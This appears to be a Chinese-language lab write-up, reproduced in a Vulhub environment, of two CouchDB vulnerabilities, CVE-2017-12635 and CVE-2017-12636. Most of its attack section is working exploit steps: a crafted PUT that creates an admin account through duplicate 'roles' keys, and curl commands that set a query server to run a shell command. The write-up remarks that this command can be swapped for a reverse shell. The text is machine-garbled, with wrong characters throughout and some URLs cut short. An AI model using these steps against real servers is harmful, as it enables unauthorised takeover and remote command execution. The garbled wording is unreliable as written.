前言

CouchDB 是一个开源的面向文档的数据库管理系统,能够通过 RESTful JavaScript Object Notation (JSON) API 拜访。CVE-2017-12635是因为Erlang和JavaScript对JSON解析形式的不同,导致语句执行产生差异性导致的。这个破绽能够让任意用户创立管理员,属于垂直权限绕过破绽。

CVE-2017-12636是一个任意命令执行破绽,咱们能够通过config api批改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。
影响版本:

小于 1.7.0 以及小于 2.1.1

破绽复现

环境搭建

应用Vulhub的破绽平台进行复现

docker-compose up -d

拜访http://192.168.52.128:5984/_u...呈现如下页面搭建胜利

测试过程

CVE-2017-12635

结构创立账户的PUT包

PUT /_users/org.couchdb.user:liangban HTTP/1.1Host: www.0-sec.org:5984Accept: /Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 104 {   "type": "user",   "name": "liangban",   "roles": ["_admin"],   "password": "liangban" }


咱们没有admin权限,所以报错forbidden显示只有管理员能力设置Role角色。绕过role验证:发送蕴含两个roles的数据包,即可绕过限度在原先的包中退出 "roles":[],

返回如图所示即胜利创立用户尝试应用liangban/liangban登录:

胜利登录,且为管理员账户

CVE-2017-12636

该破绽利用条件须要登录管理员用户触发,可应用下面介绍的CVE-2017-12635搭配利用

因为Couchdb 2.x和和1.x的的API接口有所差异,导致利用形式也不同,这里间接拿刚刚复现的CVE-2017-12635环境,演示2.x版本

Couchdb 2.x 引入了集群,所以批改配置的API须要减少node name,带上账号密码拜访/_membership获取node名称:
其中liangban:liangban为管理员的账户明码

curl http://liangban:liangban@192.168.52.128:5984/_membership


这里只有一个node,为:nonode@nohost
批改nonode@nohost的配置,其中id >/tmp/success是要执行的命令,能够更换为弹shell

curl -X PUT http://liangban:liangban@192.168.52.128:5984/_node/nonode@nohost/_config/query_servers/cmd -d '"id >/tmp/success"'


申请增加一个名为zhuAn的Database,以便在外面执行查问curl -X PUT 'http://liangban:liangban@192....'

申请增加一个名为test的Document,以便在外面执行查问

curl -X PUT 'http://liangban:liangban@192.168.52.128:5984/zhuan/test' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'


Couchdb 2.x删除了_temp_view,所以咱们为了触发query_servers中定义的命令,须要增加一个_view`
curl -X PUT http://liangban:liangban@192.... -d '{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"


减少_view的同时即触发了query_servers中的命令。看到返回错误信息没有关系,报错来源于执行命令之后的流程退出靶机的docker查看发现命令执行胜利,胜利写入success文件

1.6.0系列

curl -X PUT 'http://liangban:liangban@192.168.52.128:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'curl -X PUT 'http://liangban:liangban@192.168.52.128:5984/zhuan'curl -X PUT 'http://liangban:liangban@192.168.52.128:5984/zhuan/test' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'curl -X POST  'http://liangban:liangban@192.168.52.128:5984/zhuan/_temp_view?limit=10'  -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

exp

要替换对应的网址,端口,监听ip,对应版本,1.x和2.x的payload不统一。
python3 exp.py


exp文件私信公众号 CVE-2017-12636 获取